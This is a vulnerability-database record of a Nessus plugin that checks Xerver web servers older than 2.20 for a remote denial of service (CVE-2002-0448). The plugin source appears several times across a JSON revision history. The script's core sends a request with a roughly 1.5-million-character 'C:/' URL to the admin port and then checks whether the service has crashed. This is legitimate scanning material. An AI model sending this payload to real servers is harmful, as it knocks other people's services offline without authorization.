Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS
2002-06-07T00:00:00
ID XERVER_DOS.NASL Type nessus Reporter Tenable Modified 2018-11-15T00:00:00
Description
It is possible to crash the Xerver web server by sending a long URL to its administration port.
#
# (C) Tenable Network Security, Inc.
#
# Script audit and contributions from Carmichael Security
# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)
# Added BugtraqID and CAN
#
# From Bugtraq :
# Date: Fri, 8 Mar 2002 18:39:39 -0500 ?
# From:"Alex Hernandez" <al3xhernandez@ureach.com>
include("compat.inc");
if(description)
{
script_id(11015);
script_version("1.25");
script_cve_id("CVE-2002-0448");
script_bugtraq_id(4254);
script_name(english:"Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS");
script_set_attribute(
attribute:"synopsis",
value:"The remote web server is prone to a denial of service attack."
);
script_set_attribute(attribute:"description", value:
"It is possible to crash the Xerver web server by sending a long URL
to its administration port." );
script_set_attribute(
attribute:"see_also",
value:"https://seclists.org/bugtraq/2002/Mar/156"
);
script_set_attribute(
attribute:"see_also",
value:"https://seclists.org/bugtraq/2002/Mar/218"
);
script_set_attribute(
attribute:"solution",
value:"Upgrade to Xerver 2.20 or later."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2002/06/07");
script_set_attribute(attribute:"vuln_publication_date", value: "2002/03/08");
script_cvs_date("Date: 2018/11/15 20:50:26");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english:"Xerver DoS");
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
script_family(english:"Web Servers");
script_dependencies("http_version.nasl");
script_require_ports("Services/www", 32123);
exit(0);
}
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:32123, embedded: 0);
soc = open_sock_tcp(port);
if (!soc) exit(1);
s = strcat('GET /', crap(data:"C:/", length:1500000), '\r\n\r\n');
send(socket:soc, data:s);
close(soc);
if (service_is_dead(port: port) > 0)
security_warning(port);
{"id": "XERVER_DOS.NASL", "bulletinFamily": "scanner", "title": "Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS", "description": "It is possible to crash the Xerver web server by sending a long URL to its administration port.", "published": "2002-06-07T00:00:00", "modified": "2018-11-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=11015", "reporter": "Tenable", "references": ["https://seclists.org/bugtraq/2002/Mar/156", "https://seclists.org/bugtraq/2002/Mar/218"], "cvelist": ["CVE-2002-0448"], "type": "nessus", "lastseen": "2019-02-21T01:07:44", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2002-0448"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "It is possible to crash the Xerver web server by sending a long URL to its administration port.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "683c5e95cf26dce6f78a205f3abf44c63dabd97fa38dc5570dc2f12507efa932", "hashmap": [{"hash": "0c94dc823bf586f438e8815482c066f1", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "20370b7abae878a0affd604d714cf91f", "key": "title"}, {"hash": "aa5bc34d6bd5933dd73ae2251bff88e8", "key": "pluginID"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "451ccf9b33cae434b1236ed7a06114ec", "key": "modified"}, {"hash": "800a84159e20bd2db916c84fe28df7c1", "key": "references"}, {"hash": "66fd64eb53c040aa2c39d1d5cb15da44", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "c1405cc79bbfd468c35bd31823186f58", "key": "cvelist"}, {"hash": "dcbd1dea573401765a5800475c9db4d4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "0a3ce577ad7a32d660283b7d76c94fd0", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11015", "id": "XERVER_DOS.NASL", "lastseen": "2016-11-16T01:28:20", "modified": "2016-11-15T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.2", "pluginID": "11015", "published": "2002-06-07T00:00:00", "references": ["http://seclists.org/bugtraq/2002/Mar/218", "http://seclists.org/bugtraq/2002/Mar/156"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n#\n# From Bugtraq :\n# Date: Fri, 8 Mar 2002 18:39:39 -0500 ?\n# From:\"Alex Hernandez\" <al3xhernandez@ureach.com> \n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(11015);\n script_version(\"$Revision: 1.23 $\");\n\n script_cve_id(\"CVE-2002-0448\");\n script_bugtraq_id(4254);\n script_osvdb_id(6772);\n\n script_name(english:\"Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is prone to a denial of service attack.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to crash the Xerver web server by sending a long URL\nto its administration port.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://seclists.org/bugtraq/2002/Mar/156\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://seclists.org/bugtraq/2002/Mar/218\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Xerver 2.20 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/03/08\");\n script_cvs_date(\"$Date: 2016/11/15 19:41:09 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Xerver DoS\");\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2002-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 32123);\n exit(0);\n}\n\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:32123, embedded: 0);\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1);\ns = strcat('GET /', crap(data:\"C:/\", length:1500000), '\\r\\n\\r\\n');\nsend(socket:soc, data:s);\nclose(soc);\n\nif (service_is_dead(port: port) > 0)\n security_warning(port);\n", "title": "Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2016-11-16T01:28:20"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2002-0448"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "It is possible to crash the Xerver web server by sending a long URL to its administration port.", "edition": 6, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "a568f1ac45f9d391769aaaa786948ab8c5e1b43b74919cd1da05c69e9fab54d5", "hashmap": [{"hash": "0c94dc823bf586f438e8815482c066f1", "key": "description"}, {"hash": "76d0272557711baa5bd207350ca527db", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "20370b7abae878a0affd604d714cf91f", "key": "title"}, {"hash": "aa5bc34d6bd5933dd73ae2251bff88e8", "key": "pluginID"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "de145e526e4c9db53b7f457e4476babd", "key": "references"}, {"hash": "66fd64eb53c040aa2c39d1d5cb15da44", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "c1405cc79bbfd468c35bd31823186f58", "key": "cvelist"}, {"hash": "dcbd1dea573401765a5800475c9db4d4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11015", "id": "XERVER_DOS.NASL", "lastseen": "2018-11-17T03:17:00", "modified": "2018-11-15T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "11015", "published": "2002-06-07T00:00:00", "references": ["https://seclists.org/bugtraq/2002/Mar/156", "https://seclists.org/bugtraq/2002/Mar/218"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n#\n# From Bugtraq :\n# Date: Fri, 8 Mar 2002 18:39:39 -0500 ?\n# From:\"Alex Hernandez\" <al3xhernandez@ureach.com> \n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(11015);\n script_version(\"1.25\");\n\n script_cve_id(\"CVE-2002-0448\");\n script_bugtraq_id(4254);\n\n script_name(english:\"Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is prone to a denial of service attack.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to crash the Xerver web server by sending a long URL\nto its administration port.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2002/Mar/156\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2002/Mar/218\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Xerver 2.20 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/03/08\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Xerver DoS\");\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 32123);\n exit(0);\n}\n\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:32123, embedded: 0);\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1);\ns = strcat('GET /', crap(data:\"C:/\", length:1500000), '\\r\\n\\r\\n');\nsend(socket:soc, data:s);\nclose(soc);\n\nif (service_is_dead(port: port) > 0)\n security_warning(port);\n", "title": "Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 6, "lastseen": "2018-11-17T03:17:00"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2002-0448"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "It is possible to crash the Xerver web server by sending a long URL to its administration port.", "edition": 1, "hash": "6f0e21bce69ac1358b69b38cdd629e93a3d4587e7abf84996d74018589b33356", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0c94dc823bf586f438e8815482c066f1", "key": "description"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "20370b7abae878a0affd604d714cf91f", "key": "title"}, {"hash": "aa5bc34d6bd5933dd73ae2251bff88e8", "key": "pluginID"}, {"hash": "132b1b89ab6aa57018d0f7d58122c20b", "key": "cvss"}, {"hash": "0b641e186e1f68945e42e99b9bd4fbd7", "key": "modified"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "66fd64eb53c040aa2c39d1d5cb15da44", "key": "href"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c1405cc79bbfd468c35bd31823186f58", "key": "cvelist"}, {"hash": "dcbd1dea573401765a5800475c9db4d4", "key": "published"}, {"hash": "9743ccecbdd85e61cdacedaff2125719", "key": "references"}, {"hash": "8124eda83c4b17e2115bf6b33d43e997", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11015", "id": "XERVER_DOS.NASL", "lastseen": "2016-09-26T17:26:43", "modified": "2011-03-11T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.2", "pluginID": "11015", "published": "2002-06-07T00:00:00", "references": ["http://archives.neohapsis.com/archives/bugtraq/2002-03/0091.html", "http://archives.neohapsis.com/archives/bugtraq/2002-03/0155.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n#\n# From Bugtraq :\n# Date: Fri, 8 Mar 2002 18:39:39 -0500 ?\n# From:\"Alex Hernandez\" <al3xhernandez@ureach.com> \n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(11015);\n script_version(\"$Revision: 1.22 $\");\n\n script_cve_id(\"CVE-2002-0448\");\n script_bugtraq_id(4254);\n script_osvdb_id(6772);\n\n script_name(english:\"Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is prone to a denial of service attack.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to crash the Xerver web server by sending a long URL\nto its administration port.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://archives.neohapsis.com/archives/bugtraq/2002-03/0091.html\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://archives.neohapsis.com/archives/bugtraq/2002-03/0155.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Xerver 2.20 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/03/08\");\n script_cvs_date(\"$Date: 2011/03/11 21:52:30 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Xerver DoS\");\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2002-2011 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 32123);\n exit(0);\n}\n\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:32123, embedded: 0);\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1);\ns = strcat('GET /', crap(data:\"C:/\", length:1500000), '\\r\\n\\r\\n');\nsend(socket:soc, data:s);\nclose(soc);\n\nif (service_is_dead(port: port) > 0)\n security_warning(port);\n", "title": "Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:26:43"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2002-0448"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "It is possible to crash the Xerver web server by sending a long URL to its administration port.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "564cabe040b0a982e52c831abeae5b0ee732b6aec2dd4c01ce42e2cbe9e9414e", "hashmap": [{"hash": "0c94dc823bf586f438e8815482c066f1", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "20370b7abae878a0affd604d714cf91f", "key": "title"}, {"hash": "aa5bc34d6bd5933dd73ae2251bff88e8", "key": "pluginID"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f4821b4fa0bd394a80e0a93f20cc2030", "key": "sourceData"}, {"hash": "728473341116a99431f0ee4793831664", "key": "modified"}, {"hash": "800a84159e20bd2db916c84fe28df7c1", "key": "references"}, {"hash": "66fd64eb53c040aa2c39d1d5cb15da44", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "c1405cc79bbfd468c35bd31823186f58", "key": "cvelist"}, {"hash": "dcbd1dea573401765a5800475c9db4d4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11015", "id": "XERVER_DOS.NASL", "lastseen": "2018-06-29T06:20:03", "modified": "2018-06-27T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "11015", "published": "2002-06-07T00:00:00", "references": ["http://seclists.org/bugtraq/2002/Mar/218", "http://seclists.org/bugtraq/2002/Mar/156"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n#\n# From Bugtraq :\n# Date: Fri, 8 Mar 2002 18:39:39 -0500 ?\n# From:\"Alex Hernandez\" <al3xhernandez@ureach.com> \n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(11015);\n script_version(\"1.24\");\n\n script_cve_id(\"CVE-2002-0448\");\n script_bugtraq_id(4254);\n\n script_name(english:\"Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is prone to a denial of service attack.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to crash the Xerver web server by sending a long URL\nto its administration port.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://seclists.org/bugtraq/2002/Mar/156\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://seclists.org/bugtraq/2002/Mar/218\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Xerver 2.20 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/03/08\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Xerver DoS\");\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 32123);\n exit(0);\n}\n\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:32123, embedded: 0);\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1);\ns = strcat('GET /', crap(data:\"C:/\", length:1500000), '\\r\\n\\r\\n');\nsend(socket:soc, data:s);\nclose(soc);\n\nif (service_is_dead(port: port) > 0)\n security_warning(port);\n", "title": "Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-06-29T06:20:03"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2002-0448"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "It is possible to crash the Xerver web server by sending a long URL to its administration port.", "edition": 5, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "564cabe040b0a982e52c831abeae5b0ee732b6aec2dd4c01ce42e2cbe9e9414e", "hashmap": [{"hash": "0c94dc823bf586f438e8815482c066f1", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "20370b7abae878a0affd604d714cf91f", "key": "title"}, {"hash": "aa5bc34d6bd5933dd73ae2251bff88e8", "key": "pluginID"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f4821b4fa0bd394a80e0a93f20cc2030", "key": "sourceData"}, {"hash": "728473341116a99431f0ee4793831664", "key": "modified"}, {"hash": "800a84159e20bd2db916c84fe28df7c1", "key": "references"}, {"hash": "66fd64eb53c040aa2c39d1d5cb15da44", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "c1405cc79bbfd468c35bd31823186f58", "key": "cvelist"}, {"hash": "dcbd1dea573401765a5800475c9db4d4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11015", "id": "XERVER_DOS.NASL", "lastseen": "2018-09-02T00:10:25", "modified": "2018-06-27T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "11015", "published": "2002-06-07T00:00:00", "references": ["http://seclists.org/bugtraq/2002/Mar/218", "http://seclists.org/bugtraq/2002/Mar/156"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n#\n# From Bugtraq :\n# Date: Fri, 8 Mar 2002 18:39:39 -0500 ?\n# From:\"Alex Hernandez\" <al3xhernandez@ureach.com> \n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(11015);\n script_version(\"1.24\");\n\n script_cve_id(\"CVE-2002-0448\");\n script_bugtraq_id(4254);\n\n script_name(english:\"Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is prone to a denial of service attack.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to crash the Xerver web server by sending a long URL\nto its administration port.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://seclists.org/bugtraq/2002/Mar/156\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://seclists.org/bugtraq/2002/Mar/218\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Xerver 2.20 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/07\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/03/08\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Xerver DoS\");\n script_category(ACT_DENIAL);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 32123);\n exit(0);\n}\n\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:32123, embedded: 0);\n\nsoc = open_sock_tcp(port);\nif (!soc) exit(1);\ns = strcat('GET /', crap(data:\"C:/\", length:1500000), '\\r\\n\\r\\n');\nsend(socket:soc, data:s);\nclose(soc);\n\nif (service_is_dead(port: port) > 0)\n security_warning(port);\n", "title": "Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-02T00:10:25"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2002-0448"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "It is possible to crash the Xerver web server by sending a long URL to its administration port.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "965a693b89ff748203b4be062d45ccabb466bdf8438d099d671873687bbcd2a8", "hashmap": [{"hash": "0c94dc823bf586f438e8815482c066f1", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "20370b7abae878a0affd604d714cf91f", "key": "title"}, {"hash": "aa5bc34d6bd5933dd73ae2251bff88e8", "key": "pluginID"}, {"hash": "07a0416e4de2a26a0531240b230d9eca", "key": "naslFamily"}, {"hash": "f4821b4fa0bd394a80e0a93f20cc2030", "key": "sourceData"}, {"hash": "728473341116a99431f0ee4793831664", "key": "modified"}, {"hash": "800a84159e20bd2db916c84fe28df7c1", "key": "references"}, {"hash": "66fd64eb53c040aa2c39d1d5cb15da44", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c1405cc79bbfd468c35bd31823186f58", "key": "cvelist"}, {"hash": "dcbd1dea573401765a5800475c9db4d4", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=11015", "id": "XERVER_DOS.NASL", "lastseen": "2018-08-30T19:58:25", "modified": "2018-06-27T00:00:00", "naslFamily": "Web Servers", "objectVersion": "1.3", "pluginID": "11015", "published": "2002-06-07T00:00:00", "references": ["http://seclists.org/bugtraq/2002/Mar/218", "http://seclists.org/bugtraq/2002/Mar/156"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added BugtraqID and CAN\n#\n# From Bugtraq :\n# Date: Fri, 8 Mar 2002 18:39:39 -0500 ?\n# From:\"Alex Hernandez\" <al3xhernandez@ureach.com> \n\n\ninclude(\"compat.inc\");\n\n\nif(description)\n{\n script_id(11015);\n script_version(\"1.24\");\n\n script_cve_id(\"CVE-2002-0448\");\n script_bugtraq_id(4254);\n\n script_name(english:\"Xerver Web Server < 2.20 Crafted C:/ Request Remote DoS\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote web server is prone to a denial of service attack.\"\n );\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to crash the Xerver web server by sending a long URL\nto its administration port.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://seclists.org/bugtraq/2002/Mar/156\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://seclists.org/bugtraq/2002/Mar/218\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Xerver 2.20 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n 